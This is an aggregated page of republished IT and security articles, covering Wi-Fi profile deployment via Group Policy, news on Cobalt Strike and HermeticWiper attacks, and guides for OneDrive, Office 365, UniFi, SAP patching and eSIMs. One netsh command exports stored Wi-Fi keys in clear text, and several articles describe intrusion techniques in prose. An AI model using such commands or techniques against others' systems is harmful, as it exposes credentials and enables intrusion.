Security Archives - Page 75 of 94

Deploying WPA2 WiFi profile (including Pre-Shared key) using Group Policy

Problem

Whilst there is a setting in Group Policy Preferences to deploy WiFi settings, this does not include the WiFi Pre-Shared Key (PSK).

The following method will allow you to also push out the Pre-Shared Key:

Solution

From a PC that already has the WiFi profile installed:

Open command prompt (as admin) and run the following command. Make a note of the name of the profile you want to export:

netsh wlan show profiles

Run the following command, replacing the profile name with the one you wish to export, and path to an existing folder where an XML file will be created

netsh wlan export profile name="MyWiFiSSID" folder=C:\WLAN key=clear

Note that the key=clear is vital for this to work.

Copy that XML file to a network share that is accessible from the computer accounts. Do bear in mind the WiFi key is visible in plain text within this file, so consideration must be taken as where/how to store it.

The following command is used to install the profile:

netsh wlan add profile filename="\\servername\share\Wi-Fi-MyWiFiSSID.xml" user=all

… however, this will reinstall and reconnect the WiFi each time.

From my experience, the best method is to create a Computer Startup script GPO that will only run once. This one does the trick:

IF EXIST C:\WiFi.txt GOTO END

netsh wlan add profile filename="\\servername\share\Wi-Fi-MyWiFiSSID.xml" user=all >> C:\WiFi.txt

Source :
https://goddamnpc.com/deploying-wpa2-wifi-profile-including-pre-shared-key-using-group-policy/

Hackers Backdoor Unpatched Microsoft SQL Database Servers with Cobalt Strike

Vulnerable internet-facing Microsoft SQL (MS SQL) Servers are being targeted by threat actors as part of a new campaign to deploy the Cobalt Strike adversary simulation tool on compromised hosts.

“Attacks that target MS SQL servers include attacks to the environment where its vulnerability has not been patched, brute forcing, and dictionary attack against poorly managed servers,” South Korean cybersecurity company AhnLab Security Emergency Response Center (ASEC) said in a report published Monday.

Cobalt Strike is a commercial, full-featured penetration testing framework that allows an attacker to deploy an agent named “Beacon” on the victim machine, granting the operator remote access to the system. Although billed as a red team threat simulation platform, cracked versions of the software have been actively used by a wide range of threat actors.

Intrusions observed by ASEC involve the unidentified actor scanning port 1433 to check for exposed MS SQL servers to perform brute force or dictionary attacks against the system administrator account, i.e., “sa” account, to attempt a log in.

That’s not to say that servers not left accessible over the internet aren’t vulnerable, what with the threat actor behind LemonDuck malware scanning the same port to laterally move across the network.

“Managing admin account credentials so that they’re vulnerable to brute forcing and dictionary attacks as above or failing to change the credentials periodically may make the MS-SQL server the main target of attackers,” the researchers said.

Upon successfully gaining a foothold, the next phase of the attack works by spawning a Windows command shell via the MS SQL “sqlservr.exe” process to download the next-stage payload that houses the encoded Cobalt Strike binary on to the system.

The attacks ultimately culminate with the malware decoding the Cobalt Strike executable, followed by injecting it into the legitimate Microsoft Build Engine (MSBuild) process, which has been previously abused by malicious actors to filelessly deliver remote access trojans and password-stealing malware on targeted Windows systems.

Furthermore, the Cobalt Strike that’s executed in MSBuild.exe comes with additional configurations to evade detection of security software. It achieves this by loading “wwanmm.dll,” a Windows library for WWan Media Manager, then writing and running the Beacon in the memory area of the DLL.

“As the beacon that receives the attacker’s command and performs the malicious behavior does not exist in a suspicious memory area and instead operates in the normal module wwanmm.dll, it can bypass memory-based detection,” the researchers noted.

Source :
https://thehackernews.com/2022/02/hackers-backdoor-unpatched-microsoft.html

New Wiper Malware Targeting Ukraine Amid Russia’s Military Operation

Cybersecurity firms ESET and Broadcom’s Symantec said they discovered a new data wiper malware used in fresh attacks against hundreds of machines in Ukraine, as Russian forces formally launched a full-scale military operation against the country.

The Slovak company dubbed the wiper “HermeticWiper” (aka KillDisk.NCV), with one of the malware samples compiled on December 28, 2021, implying that preparations for the attacks may have been underway for nearly two months.

“The wiper binary is signed using a code signing certificate issued to Hermetica Digital Ltd,” ESET said in a series of tweets. “The wiper abuses legitimate drivers from the EaseUS Partition Master software in order to corrupt data. As a final step the wiper reboots [the] computer.”

Specifically, HermeticWiper is delivered via the benign but signed EaseUS partition management driver that then proceeds to impair the first 512 bytes, the Master Boot Record (MBR) for every physical drive, before initiating a system shutdown and effectively rendering the machine inoperable.

“After a week of defacements and increasing DDoS attacks, the proliferation of sabotage operations through wiper malware is an expected and regrettable escalation,” SentinelOne’s principal threat researcher Juan Andres Guerrero-Saade said in a report analyzing the new malware.

At least one of the intrusions involved deploying the malware directly from the Windows domain controller, indicating that the attackers had taken control of the target network.

The scale and the impact of the data-wiping attacks remains unknown as yet, as is the identity of the threat actor behind the infections. But the development marks the second time this year that a destructive malware has been deployed on Ukrainian computer systems after the WhisperGate operation in mid-January.

The wiper attacks also follow a third “massive” wave of distributed denial-of-service (DDoS) attacks that hit several Ukrainian government and banking institutions on Wednesday, knocking out online portals for the Ministry of Foreign Affairs, Cabinet of Ministers, and Rada, the country’s parliament.

Last week, two of the largest Ukrainian banks, PrivatBank and Oschadbank, as well as the websites of the Ukrainian Ministry of Defense and the Armed Forces suffered outages as a result of a DDoS attack from unknown actors, prompting the U.K. and U.S. governments to point the fingers at the Russian Main Intelligence Directorate (GRU), an allegation the Kremlin has denied.

Campaigns that use DDoS attacks deliver torrents of junk traffic that are intended to overwhelm targets with the goal of rendering them inaccessible. A subsequent analysis of the February 15 incidents by the CERT-UA found that they were carried out using botnets such as Mirai and Mēris by leveraging compromised MikroTik routers and other IoT devices.

What’s more, information systems belonging to Ukraine’s state institutions are said to have been unsuccessfully targeted in as many as 121 cyber attacks in January 2022 alone.

That’s not all. Cybercriminals on the dark web are looking to capitalize on the ongoing political tensions by advertising databases and network accesses containing information on Ukrainian citizens and critical infra entities on RaidForums and Free Civilian marketplaces in “hopes of gaining high profits,” according to a report published by Accenture earlier this week.

The continuous onslaught of disruptive malicious cyber acts since the start of the year has also led the Ukrainian law enforcement authority to paint the attacks as an effort to spread anxiety, undermine confidence in the state’s ability to defend its citizens, and destabilize its unity.

“Ukraine is facing attempts to systematically sow panic, spread fake information and distort the real state of affairs,” the Security Service of Ukraine (SSU) said on February 14. “All this combined is nothing more than another massive wave of hybrid warfare.”

Source :
https://thehackernews.com/2022/02/new-wiper-malware-targeting-ukraine.html

Back up your Documents, Pictures, and Desktop folders with Microsoft OneDrive

You can back up your important folders (your Desktop, Documents, and Pictures folders) on your Windows PC with OneDrive PC folder backup, so they’re protected and available on other devices. If you haven’t already set up OneDrive on your computer, see Sync files with OneDrive in Windows. There’s no extra cost for PC folder backup (up to 5 GB of files without a subscription). See OneDrive plans.

Note: If you’re surprised that your files are saving to OneDrive, see Files save to OneDrive by default in Windows 10.https://www.microsoft.com/en-us/videoplayer/embed/RE2PM4G?pid=ocpVideo0-innerdiv-oneplayer&jsapi=true&postJsllMsg=true&maskLevel=20&market=en-us

Set up PC folder backup

If you’re prompted to back up your important folders (Desktop, Documents, and Pictures), select the prompt to start the folder backup wizard.If you didn’t see the prompt or you already closed the wizard, select the white or blue cloud icon in the Windows notification area, and then select Help & Settings > Settings, then Backup > Manage backup.
In the Back up your folders dialog, make sure the folders that you want to back up are selected.
Select Start backup.
You can close the dialog box while your files sync to OneDrive. Or, to watch your files sync, select View upload progress. If you already closed the dialog, to open the OneDrive activity center, select the white or blue cloud in the notification area.

Access your backed up folders on any device

When your files finish syncing to OneDrive, they’re backed up and you can access them from anywhere in Documents, Desktop, or Pictures. When you back up your Desktop folder, the items on your desktop roam with you to your other PC desktops where you’re running OneDrive.

You can back up a maximum of 5 GB of files in OneDrive for free, or up to 1 TB with a Microsoft 365 subscription.

Try Microsoft 365 for free

If you’re signed in to the OneDrive sync app on your computer, you can use File Explorer to access your OneDrive. You can also use the OneDrive mobile app to access your folders on any device.

Manage or stop PC folder backup

To stop or start backing up your folders in OneDrive, update your folder selections in OneDrive Settings.

Open OneDrive settings (select the white or blue cloud icon in your notification area, and then select Help & Settings > Settings.)
In Settings, select Backup > Manage backup.
To start backing up a folder, select any folder that doesn’t say Files backed up, and then select Start backup.
To stop backing up a folder, select Stop backup, and confirm your request. See important notes below.

Screenshot of when you stop protecting folders in OneDrive

When you stop backing up a folder, the files that were already backed up by OneDrive stay in the OneDrive folder, and will no longer appear in your device folder.
In the folder that you stopped backing up, you’ll see an icon titled Where are my files that’s a shortcut to your folders in OneDrive. To access your files, select the icon to open the folder in OneDrive.
If you want those files back in your device folder and not in OneDrive, move them manually from the OneDrive folder back to your device folder. Note that any new files you add to that folder on your device won’t be backed up by OneDrive after you stop the backup.
To move the files. select Where are my files to open the folder in OneDrive, then select the files that you want to move to your device folder, and drag them to that location.

Fix problems with PC folder backup

Here are a list of errors you might see when you set up PC folder backup and how to resolve them:

The following file type can’t be protected: Outlook database files (.pst).
Folder protection is unavailable: A common reason for this error is that important folders on PCs that are connected to a domain can’t be protected in a personal OneDrive account (when you’re signed in with a Microsoft account). For info about data protection solutions, contact your IT administrator. You shouldn’t have this issue with a work or school account.
File exceeds the maximum path length: Make sure the entire file path, including the file name, contains fewer than 260 characters. An example of a file path is:
C:\Users\<UserName>\Pictures\Saved\2017\December\Holiday\NewYears\Family…
To resolve this, shorten the name of your file or the name of subfolders in OneDrive, or select a sub-folder that’s closer to the top-level folder.
File exceeds the maximum file size: OneDrive can’t sync files over 250GB. Remove these files from the folder you want to protect and then try again.
The file name isn’t allowed in OneDrive: File names can’t start with a space or include any of these characters: \ : / * ? < > ” |. Please move or rename the file to continue.
The folder isn’t selected for syncing: The folder with the error is not syncing to your PC. To resolve this error, open OneDrive Settings (right-click the white or blue cloud icon in your notification area, and select Settings), select Choose Folders, and then make sure the folder you want to protect is selected. If Pictures is showing this error, make sure that Pictures, Screenshots, and Camera Roll are all selected (or don’t exist). It’s also possible that the OneDrive folder has a different name from the Windows important folder.
Important folders aren’t in the default locations: The folder with the error contains another important folder and can’t be protected until the contained folder is moved. Important folders that may be contained within the folder include: Documents, Desktop, Pictures, Screenshots, Camera Roll, or the OneDrive folder.
An unknown error occurred, with error code 0x80070005: If you receive error code 0x80070005, the “Prohibit User from manually redirecting Profile Folders” group policy is enabled. You may find that the files from the folders you selected were moved to identically named folders in your OneDrive folder, and the original locations are empty. Move the folder contents back to the original locations and ask your administrator whether the policy can be changed.
Folder contains a reparse point (junction point or symlink): The folder you want to protect contains a special file type that links parts of the file system together. These items can’t be protected. To protect the folder, remove the file causing the issue.
Post PC folder backup: OneDrive tries to automatically re-open notebooks that were previously open. In rare cases, some notebooks may not be automatically loaded in the OneNote desktop app after PC folder backup. Workaround for this issue is to reopen the notebooks in the OneNote app using File > Open.Caution: Some applications may depend on these links to function properly. Remove only the links that you know are safe to modify.

Source :
https://support.microsoft.com/en-us/office/back-up-your-documents-pictures-and-desktop-folders-with-onedrive-d61a7930-a6fb-4b95-b28a-6552e77c3057

Microsoft Office 365 to stop data theft by disabling external forwarding

Microsoft is planning to put a stop to enterprise data theft via email forwarding by disabling Office 365’s email forwarding to external recipients by default.

The company also wants to add improved external email forwarding controls which will allow Office 365 admins to enable the feature only to select employees in their organizations.

“External forwarding of email is a tactic used by attackers to exfiltrate data out of an organization and controlling that process is difficult,” Microsoft explains on the new feature’s Microsoft 365 roadmap entry.

“With this new feature, we are adding support for more granular controls that allow the Office 365 administrators to easily enable external forwarding for the right people in the organization through the outbound spam policy.”

The new feature is planned to be generally available and start to roll out to all environments with an Office 365 Advanced Threat Protection (ATP) plans starting with the fourth quarter of 2020.

How to stop auto-forwarding for emails

Until external email forwarding will be disabled by default, Microsoft provides step by step instructions on how to stop it manually to prevent hackers from stealing proprietary information by exfiltrating it to outside email addresses under their control.

To do this, you will have to create a custom mail flow rule by following these steps:• Go to the Exchange admin center, select Exchange, mail flow, and on the rules tab, select the plus sign and choose to create a new rule.
• Select More options. Name your new rule.
• Then open the drop-down to apply this rule if, select the sender and then is external internal.
• Select Inside the organization, and then OK.
• Choose to add condition, open the drop-down, select The message properties, then include the message type.
• Open the select message type drop-down, choose Auto-forward, then OK.
• Open the Do the following drop-down, select Block the message, then reject the message and include an explanation.
• Enter the message text for your explanation, then select OK.
• Scroll to the bottom and select Save.

Once the rule has been created, attackers will no longer be able to enable auto-forwarding for that user’s mailbox.

A video tutorial for this entire procedure is also embedded below.

Increase your org’s security

Redmond also has a list of ten measures you can take to boost your organization’s data security for both Microsoft 365 Business Standard and Microsoft 365 Business Premium service plans.

The list of tasks you need to go through to increase the security of your organization:1. Set up multi-factor authentication (MFA) to prevent hackers from taking over accounts if they know the password.
2. Train your users to use strong passwords, protect their devices, and enable security features on Windows 10 and Mac PCs.
3. Use dedicated admin accounts.
4. Raise the level of protection against malware in mail (guidance on how to do that is available in this training video).
5. Protect against ransomware by blocking file extensions commonly used for ransomware using mail flow rules.
6. Stop auto-forwarding for email.
7. Use Office Message Encryption.
8. Protect your email from phishing attacks using an ATP anti-phishing policy.
9. Protect against malicious attachments and files with ATP safe attachment policies.
10. Protect against phishing attacks with ATP Safe Links.

Part of a broader push to secure Office 365

This new Office 365 ATP feature is part of a larger effort to make the cloud-based email filtering service secure by default as Microsoft also wants to include a new feature that will block email sender domains automatically if they fail DMARC authentication.

Redmond is also working on including automated malicious content blocking in Office 365 regardless of admin or user custom configurations unless manually overridden.

Once this new feature will be enabled, Office 365 will honor EOP/ATP malware analysis (detonation) verdicts to automatically block known malicious files and URLs.

In October 2019, Microsoft also enabled Authenticated Received Chain (ARC) for all hosted mailboxes to improve anti-spoofing detection. The ARC protocol supplements the DKIM and DMARC email authentication protocols as part of Internet Mail Handlers’ effort to combat email spoofing especially when dealing with forwarded messages.

Source :
https://www.bleepingcomputer.com/news/security/office-365-to-stop-data-theft-by-disabling-external-forwarding/

How to set up the ultimate Ubiquiti UniFi home network in 2022

If you’re in the market for a new Wi-Fi 6 router, the best deliver reliable coverage to all corners of your home at little cost to get started. If you need extensibility, mesh routers allow you to add additional nodes. But if you want extensive configuration options and an all-in-one solution to cover routing, switching, and home security, consider Ubiquiti’s portfolio. Its UniFi brand covers switches and routers aimed at small businesses, but it turned its attention to the consumer category over the last two years with a decent selection of products. Ubiquiti offers a range of security cameras and video doorbells under UniFi Protect, can easily integrate into an UniFi network. The best part about Ubiquiti’s home security products is they record footage locally and don’t send data to a cloud service, providing better privacy without paying a monthly license to access all the security camera and video doorbell features. So if you’re looking to overhaul your home network, here’s what Ubiquiti has to offer.

All-in-one solution: UniFi Dream Router

Ubiquiti UniFi Dream Machine review Source: Harish Jonnalagadda / Android Central

If you don’t want to get a standalone wired router, switch over and add wireless access points, then you’ll want to take a look at Ubiquiti’s unified solutions. The latest offering is the UniFi Dream Router, and it goes up against the best Wi-Fi 6 routers. It’s the second all-in-one device in the UniFi range — after the Wi-Fi 5-based UniFi Dream Machine — and the feature-set you get here is astounding when you consider what it costs.

But first, a rundown of the hardware: the Dream Router has a cylindrical design similar to the Dream Machine, but a tiny screen at the front shows real-time network statistics. The router has 4×4 MIMO and goes up to 2.4Gbps with Wi-Fi 6, and it utilizes 160MHz channels. There’s a dual-core CPU, 128GB of storage, an SD card slot, 2GB of RAM, and four Ethernet ports with two offering PoE.

Because it is an UniFi product, the Dream Router has an exhaustive set of configuration options that far exceed most consumer routers. For example, it lets you connect and manage Ubiquiti’s security cameras and video doorbells. It is relatively straightforward to set up from your phone, and if you don’t want to tweak every setting, that’s fine. The options are there should you need them.

Now, there are a few caveats. First, the Dream Router is still in testing and isn’t finalized, and as such, you can only buy it from Ubiquiti’s Early Access store. You’ll have to make a free account to access the store, and while it’s sold out, it’s being restocked regularly. The Dream Router sells out periodically because of its price: $79.

For under $100, there isn’t another router that delivers anywhere close to the same set of features as the Dream Router, and with the router estimated to debut for a lot more once it hits the regular sales channel, now is the best time to pick it up.

UniFi Dream Router

With 4×4 MIMO and 2.4Gbps bandwidth over Wi-Fi 6, four Gigabit Ethernet ports with two PoE ports, and a screen at the front for monitoring real-time traffic, the Dream Router is the ultimate value.

Routing: UniFi Dream Machine Pro

Ubiquiti UniFi Dream Machine Pro review Source: Harish Jonnalagadda / Android Central

If you want to use a standalone router for managing your home network, you should take a look at the UniFi Dream Machine Pro (UDM Pro). I switched to the UDM Pro last year, and it has been a revelation. However, unlike the Dream Machine or Dream Router, the UDM Pro is a 1U rack-mounted solution, so you will need a rack server if you want to go down this route.

The UDM Pro is designed to be a wired router, so you’ll have to buy a switch and a wireless AP to connect your wireless devices like phones, tablets, and notebooks. Now, the standout feature with the UDM Pro is that it has a 3.5-inch HDD slot to facilitate network video recording (NVR), so if you want to add Ubiquiti’s security cameras to your network, this is the ideal way to go. In addition, you can slot in a 4TB drive in the UDM Pro and access locally-stored recordings going back weeks and months.

As for hardware, the UDM Pro has a built-in switch with eight Gigabit ports with a 1GbE backplane, 10Gbps SFP+ ports, and a quad-core CPU with Cortex-A57 cores. It includes the full suite of UniFi OS applications, including UniFi Network for switching, UniFi Protect for security cameras, UniFi Talk for VoIP, and UniFi Access for managing door access in a small office environment. The UDM Pro also offers intrusion detection and prevention features that block access to malicious websites.

Having used the UDM Pro extensively for the last year, the only downside I can think of is that it lacks built-in PoE ports. So when you’re connecting Ubiquiti’s wireless access points, you will need to buy an additional PoE injector.

UniFi Dream Machine Pro

The UDM Pro sits at the heart of a prosumer UniFi install. The rack-mounted router comes with an 8-port switch and 10G SFP+ ports, a 3.5-inch drive tray to use as a network video recorder, and class-leading threat management features.

Switching: UniFi Switch 24 PoE

Ubiquiti UniFi Dream Machine Pro review Source: Harish Jonnalagadda / Android Central

While I have over 30 devices connected to the wireless access points in my home at any given time, I use wired connectivity for the devices that I use the most, including the work machines, TVs, and the PS5. So while the UDM Pro has an eight-port switch, I find that a 24-port option is the best way to go, particularly if you’re going to connect a lot of security cameras. For context, I’m currently using over a dozen ports on my Switch Pro 24 PoE.

As for the switch, the Switch Pro 24 PoE is a fantastic choice, but at $699, it is also very costly. My recommendation would be the standard Switch 24 PoE; it is a 24-port switch with 16 Gigabit PoE+ ports with a total power budget of 95W alongside eight Gigabit ports. Like the UDM Pro, it is a 1U rack-mountable solution, and you get a small screen on the left for viewing real-time statistics.

The 95W power budget is more than adequate for the wireless access points and security cameras, and at $379, the Switch 24 PoE costs nearly half as much as the Pro version, and while you miss out on 10Gbps SFP+ ports, it has most of the essentials covered. If you don’t want a rack-mounted solution, you should look at the Switch Lite 16 PoE, a 16-port switch with eight PoE+ ports.

UniFi Switch 24 PoE

If you need more ports for wired connections, the Switch 24 PoE is the ideal option. It has 16 802.3at PoE ports with a cumulative power budget of 95W and can easily accommodate a slate of wireless access points and security cameras.

Wireless: UniFi Access Point Wi-Fi 6 Lite

UniFi Access Point Wi-Fi 6 Source: Ubiquiti

With a wired router and switch sorted out, you’ll need a wireless access point so wireless devices like phones and tablets can connect to your home network. Ubiquiti has three options in this area: Wi-Fi 6 Lite, 6 Pro, and 6 Long Range. As the name suggests, all three are based on Wi-Fi 6, and they share a similar design.

These APs work best when mounted on the ceiling or the wall as the antennae are positioned sideways. The $99 Wi-Fi 6 Lite has 2×2 MIMO and goes up to 1.2Gbps on the 5GHz band, with a gain of 3dBi. The $149 Wi-Fi 6 Pro and $179 Wi-Fi 6 Long Range have IP54 ratings, draw power using the 802.3at PoE+ standard, and are designed for indoor and outdoor use.

The Wi-Fi 6 Pro is the newer offering and comes with higher-gain antennae that go up to 6dBi, with maximum 5GHz throughput of 4.8Gbps, with the Long Range going up to 5.5dBi and 2.4Gbps over 5GHz. The Wi-Fi 6 Pro also is the only access point in Ubiquiti’s portfolio that offers the 160MHz channel.

I use a Wi-Fi 6 Long Range and Wi-Fi 6 Lite in my home, but if you’re starting from scratch, a good bet would be to get a Wi-Fi 6 Lite and Wi-Fi 6 Pro to get going and add more as needed. These access points seamlessly integrate into the UniFi network and can be configured with the UDM Pro.

UniFi Access Point Wi-Fi 6 Lite

The Wi-Fi 6 Lite access point has 2×2 MIMO and 1.2Gbps throughput over 5GHz, and it does a good job delivering reliable Wi-Fi 6 signal to all corners of your home.

UniFi Access Point Wi-Fi 6 Pro

Ubiquiti’s latest wireless access point has it all: 160MHz channels over Wi-Fi 6, 4×4 MIMO with a 4.8Gbps throughput at 5GHz, and the ability to connect to up to 300 clients.

Security camera and doorbell: G4 series

UniFi Protect series Source: Ubiquiti

Security cameras are a big part of the UniFi Protect portfolio, and Ubiquiti offers a dozen products in this area. I use a combination of the G3 Flex, G4 Bullet, and the G4 Dome inside (and outside) my home, and they’re pretty good at what they do. Ubiquiti’s cameras draw power over PoE and let you record 1080p footage, plus you get weather resistance with the G4 series.

In my use case, I found the G3 Flex to be ideal as an indoor camera as it can be positioned just about anywhere inside the house, with the G4 Bullet and G4 Dome suited for outdoor use. The G3 Flex starts at $79, and you can pick up a pack of three for $229

The G4 Bullet offers 1440p recording that sells for $199, and if you want 4K video, 3x zoom lens, and IP67, you will need to get the $449 G4 Pro. Several users had issues with condensation on the G4 Bullet last year, but that hasn’t been a drawback for me. I haven’t used Ubiquiti’s doorbells just yet. Still, the G4 Doorbell offers a similar set of features as other smart video doorbells, including two-way audio, motion detection, and Wi-Fi connectivity. Here’s a breakdown of the feature-set that each security camera offers:

UniFi Protect series Source: Ubiquiti

You can pair the security cameras and doorbells to any UniFi routing solution with UniFi Protect. As for managing the security devices, you can install the UniFi Protect app on your phone and configure motion detection areas, privacy zones where the cameras won’t record footage, and smart detection for faces and vehicles.

You get a decent number of options for notifications, including the ability to set custom schedules and receive information at a set time. The cameras do a good job with motion detection and notification alerts, and UniFi Protect has a good UI that lets you view events and see recorded footage with ease. The best part is that all footage is stored locally, so you don’t have to pay a license fee to access all the features on offer. Unfortunately, there’s no active monitoring like you get with Arlo or Ring, but UniFi Protect gets a lot right for a self-hosted solution.

UniFi Camera G3 Flex

The G3 Flex is a great indoor camera, thanks to its versatile design. You get 1080p video recording, integrated IR LEDs for motion detection at night, and a built-in mic.

UniFi Camera G4 Bullet

The G4 Bullet has 1440p recording, a weather-sealed design, a built-in mic, a 110-degree angle of view, and LEDs for recording at night.

Building your UniFi network

Ubiquiti UniFi Dream Machine Pro review Source: Harish Jonnalagadda / Android Central

Ubiquiti has significantly expanded its consumer offerings in the last two years, and if you’re interested in getting started with an UniFi home network, you have a lot of choices. The UDM Pro is ideally suited as a routing solution because of the hardware on offer and the extensive feature-set and configuration. You can pair it with a multitude of switches and wireless access points.

The reason why I switched to UniFi was the extensibility. I started with the UDM Pro, Switch Pro 24 PoE, and the Wi-Fi 6 Long Range and Wi-Fi 6 Lite for wireless access. As for security cameras, I have three units of the G3 Flex for indoor use and a G4 Bullet located outside.

I’m now eyeing the Wi-Fi 6 Pro for the balcony as that’s the one area where I don’t get adequate coverage, and the G4 Doorbell as the video doorbell. I’ve deliberated getting a Nest Doorbell, but considering I have an UniFi Protect system set up anyway, I figured the G4 Doorbell would be a better alternative.

The biggest issue with Ubiquiti products is availability. The security cameras, in particular, are constantly sold out, so you will have to wait for a restock to get your hands on the G4 Bullet or even the Dream Router. Then you’ll need to factor in cabling as most of these devices connect over Ethernet. I’m fortunate that my home has internal Cat5 cabling, but you will need to consider that if you’re looking to make the switch.

The sheer amount of features in UniFi Network, the ease-of-use of UniFi Protect, and the fact that you have complete control over the recorded footage make Ubiquiti’s products an excellent choice for prosumers. Of course, building out the entire network is a sizeable investment if you’re picking up a UDM Pro, Switch 24 PoE, two APs, and a few security cameras, but at the end of the day, you get a scalable network that will serve you well for several years.

Source :
https://www.androidcentral.com/how-set-ultimate-ubiquiti-unifi-home-network-2022

CISA warns admins to patch maximum severity SAP vulnerability

The US Cybersecurity and Infrastructure Security Agency (CISA) has warned admins to patch a set of severe security flaws dubbed ICMAD (Internet Communication Manager Advanced Desync) and impacting SAP business apps using Internet Communication Manager (ICM).

CISA added that failing to patch these vulnerabilities exposes organizations with vulnerable servers to data theft, financial fraud risks, disruptions of mission-critical business processes, ransomware attacks, and a halt of all operations.

ICMAD bugs affect most SAP products

Yesterday, Onapsis Research Labs who found and reported CVE-2022-22536, one of the three ICMAD bugs and the one rated as a maximum severity issue, also cautioned SAP customers to patch them immediately (the other two are tracked as CVE-2022-22532, and CVE-2022-22533).

The SAP Product Security Response Team (PSRT) worked with Onapsis to create security patches to address these vulnerabilities and released them on February 8, during this month’s Patch Tuesday.

If successfully exploited, the ICMAD bugs allow attackers to target SAP users, business information, and processes, and steal credentials, trigger denials of service, execute code remotely and, ultimately, fully compromise any unpatched SAP applications.

“The ICM is one of the most important components of an SAP NetWeaver application server: It is present in most SAP products and is a critical part of the overall SAP technology stack, connecting SAP applications with the Internet,” Onapsis explained.

“Malicious actors can easily leverage the most critical vulnerability (CVSSv3 10.0) in unprotected systems; the exploit is simple, requires no previous authentication, no preconditions are necessary, and the payload can be sent through HTTP(S), the most widely used network service to access SAP applications.”

No SAP customers breached using ICMAD exploits so far

SAP’s Director of Security Response Vic Chung said they’re currently not aware of any customers’ networks breached using exploits targeting these vulnerabilities and “strongly” advised all impacted organizations to immediately apply patches “as soon as possible.”

SAP customers can use this open-source tool developed by Onapsis security researchers to help scan systems for ICMAD vulnerabilities.

The German business software developer also patched other maximum severity vulnerabilities associated with the Apache Log4j 2 component used in SAP Commerce, SAP Data Intelligence 3 (on-premise), SAP Dynamic Authorization Management, Internet of Things Edge Platform, SAP Customer Checkout.

All of them allow remote threat actors to execute code on systems running unpatched software following successful exploitation.

Source :
https://www.bleepingcomputer.com/news/security/cisa-warns-admins-to-patch-maximum-severity-sap-vulnerability/

Use an eSIM to get a cellular data connection on your Windows PC

Windows 10 and Windows 11
An eSIM lets you connect to the Internet over a cellular data connection. With an eSIM, you don’t need to get a SIM card from your mobile operator, and you can quickly switch between mobile operators and data plans.

For example, you might have one cellular data plan for work, and a different plan with another mobile operator for personal use. If you travel, you can get connected in more places by finding mobile operators with plans in that area.

Here’s what you’ll need:

A PC running Windows 10, Version 1703 or later. To see which version of Windows 10 your device uses, select the Start button, then select Settings > System > About .
A PC with an eSIM in it. Here’s how you can tell if your PC has an eSIM:
1. Select the Start button, then select Settings > Network & Internet > Cellular .
2. On the Cellular screen, look for a link near the bottom of the page that says Manage eSIM profiles. If that link appears, your PC has an eSIM.

Note: Some devices have both an eSIM and physical SIM card. If you don’t see Manage eSIM profiles but you do see Use this SIM for cellular data at the top of the Cellular settings screen, select the other SIM from the drop-down box, and then see if the Manage eSIM profiles link appears.

To add an eSIM profile

You’ll need to add an eSIM profile to get an Internet connection using cellular data.

If you have a PC from your organization, an eSIM profile might already be added to your PC. If you select Manage eSIM profiles and see an eSIM profile for a mobile operator you expect to find, you can skip this procedure and go to the next one to get connected.

Select the Start button, then select Settings > Network & Internet > Cellular > Manage eSIM profiles.
Under eSIM profiles, select Add a new profile.
To search for available profiles or use an activation code you have from your mobile operator, do one of the following:
- Search for available profiles
  1. Select Search for available profiles > Next.
  2. When a profile you want to use is found, select Download.
  3. Enter the confirmation code from your mobile operator in the corresponding box, then select Download.
  4. After the profile is downloaded and installed, select Continue to find other profiles you might want and then repeat the previous steps.
  5. Select Close when you have downloaded the profiles you want.
- Use an activation code you have from your mobile operator
  1. Select Let me enter an activation code I have from my mobile operator > Next.
  2. If you have a QR code to scan for the activation code, choose which camera to use on your PC, and then scan the QR code.
  3. The activation code should appear in the corresponding Activation code box. Select Next.
  4. For the dialog box that asks Do you want to download this profile?, enter the confirmation code from your mobile operator into the corresponding box, and then select Download.
  5. Select Close.
Optional: To give the profile a friendly name (for example, Work or Personal) to help you remember it, select the profile, select Edit name, type a name you’ll remember, and then select Save.

To connect to cellular data using an eSIM profile

Select the Start button, then select Settings > Network & Internet > Cellular > Manage eSIM profiles.
Under eSIM profiles, select the profile you want, and then select Use.
Select Yes for This will use cellular data from your data plan and may incur charges. Do you want to continue?
You’ll be connected to a cellular data network and ready to go.

To switch between profiles

If you have more than one profile installed on your PC, you can switch between profiles to use a different mobile operator and data plan.

Select the Start button, then select Settings > Network & Internet > Cellular > Manage eSIM profiles.
Under eSIM profiles, select the profile you want to stop using, and then select Stop using.
Select Yes for You’ll be disconnected from this cellular network. Continue?
Select the different profile you want to use, then select Use.

To delete a profile

If you don’t want to use a profile anymore, you can delete it from your PC. If you delete the profile and want to add it again later, you’ll need to download the profile again and might need to contact your mobile operator.

Select the Start button, then select Settings > Network & Internet > Cellular > Manage eSIM profiles.
Under eSIM profiles, select the profile to delete, and then select Delete.
At the prompt that warns you that the profile will be permanently deleted, select Yes.

Note: If you have a PC from your organization, you might not be able to delete an eSIM profile because of a policy that’s set by your organization.

Source :
https://support.microsoft.com/en-us/windows/use-an-esim-to-get-a-cellular-data-connection-on-your-windows-pc-0e255714-f8be-b9ef-9e84-f75b05ed98a3#WindowsVersion=Windows_10

Cybersecurity Threat Spotlight: Emotet, RedLine Stealer, and Magnat Backdoor

Security and IT teams may be fresh off their holiday breaks, but threat actors have kept busy over the last month. In this edition of the Cybersecurity Threat Spotlight, we’re highlighting the Trojans, loaders, information stealers, and backdoors that we’re seeing online.

Want to learn more about how Cisco Umbrella can defend your enterprise against these threats? Request a personalized demo today!

Threat Name: Emotet

Threat Type: Trojan/Loader

Attack Chain:

Description: Emotet is a banking Trojan that was first detected in 2014. Emotet has evolved into a massive botnet that delivers large amounts of malspam with malicious document attachments that lead to the Emotet Trojan. The Trojan also functions as a dropper for second-stage payloads, including – but not limited to – TrickBot, Qakbot, and Ryuk. Emotet has can steal SMTP credentials and email content. The threat actors reply to legitimate conversations in a victim’s email account, injecting replies that include malicious attachments.

Emotet Spotlight: In November, security researchers observed the return of the Emotet loader, which had been inactive since January 2021 after a law enforcement takedown. Emotet is a loader botnet that uses a Loader-as-a-Service model. Emotet’s main advantage is its modular system, which enables a highly targeted approach based on the requirements of the delivered payload. Unfortunately, the botnet has historically been leveraged by adversaries conducting sophisticated ransomware attacks.

At this point, security researchers observe strong connections between Emotet and Conti Ransomware. This can indicate that two cybercriminal syndicates are or will be establishing a new partnership. Historically, Conti was known to rely on sustainable methods of operation. Emotet has proven to be able to provide initial access and a strong foothold in multiple corporate networks. This can become the new trend in adversaries, and it will likely have a major impact on the threat landscape in 2022.

Target Geolocations: Worldwide
Target Data: User Credentials, Browser Data, Sensitive Information
